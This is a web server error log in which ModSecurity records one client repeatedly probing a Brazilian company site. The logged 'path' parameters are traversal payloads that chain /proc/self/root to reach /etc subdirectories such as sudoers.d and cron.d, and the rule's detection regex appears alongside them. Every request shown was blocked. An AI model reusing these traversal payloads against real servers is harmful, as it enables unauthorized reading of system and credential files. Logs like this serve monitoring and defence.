[Mon Mar 16 19:16:22.672238 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.241.46:37156] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBNs_BxrYCr4hPDw8PAwAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:30.291677 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:37164] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBPqTCbgAP5jq5TehPNgAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:31.555455 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:36358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBP9SswJuvopo3lOiFIAAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:34.896637 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:36364] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBQqTCbgAP5jq5TehPOgAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:37.256363 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:36372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBRY6lpbStxTqkSkuMyAAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:38.555761 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:54094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBRtSswJuvopo3lOiFIgAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:40.692330 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.241.46:54102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBSFajLEzk2WiQ-102PwAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:44.036719 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.241.46:54110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBTLysWC90G-1nBrBqFQAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:45.347881 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:54112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBTbysWC90G-1nBrBqGQAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:46.494571 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:54126] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBTs_BxrYCr4hPDw8PKQAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:48.806956 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.241.46:54142] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBUM_BxrYCr4hPDw8PMAAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:50.064876 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:39690] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBUv9ocpUE4ed4uDwXiAAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:53.556478 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:39694] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBVf9ocpUE4ed4uDwXjgAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:55.863199 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.241.46:39710] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBV0r9dMAiw-8KANNtSQAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:06.143820 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:39714] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBYo6lpbStxTqkSkuM0wAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:07.466976 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:43724] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBY_9ocpUE4ed4uDwXkAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:10.387517 2026] [:error] [pid 29507:tid 140411599251200] [client 74.7.241.46:55356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBZEr9dMAiw-8KANNtWQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:14.804289 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.241.46:55360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBaqTCbgAP5jq5TehPRAAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:19.826646 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:55368] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBb_9ocpUE4ed4uDwXlQAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:21.131714 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:59830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBcc_BxrYCr4hPDw8PWQAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:22.276484 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.241.46:59840] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBclajLEzk2WiQ-102TAAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:23.566993 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:59842] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBc6QpVkWug9HeOt9XzwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
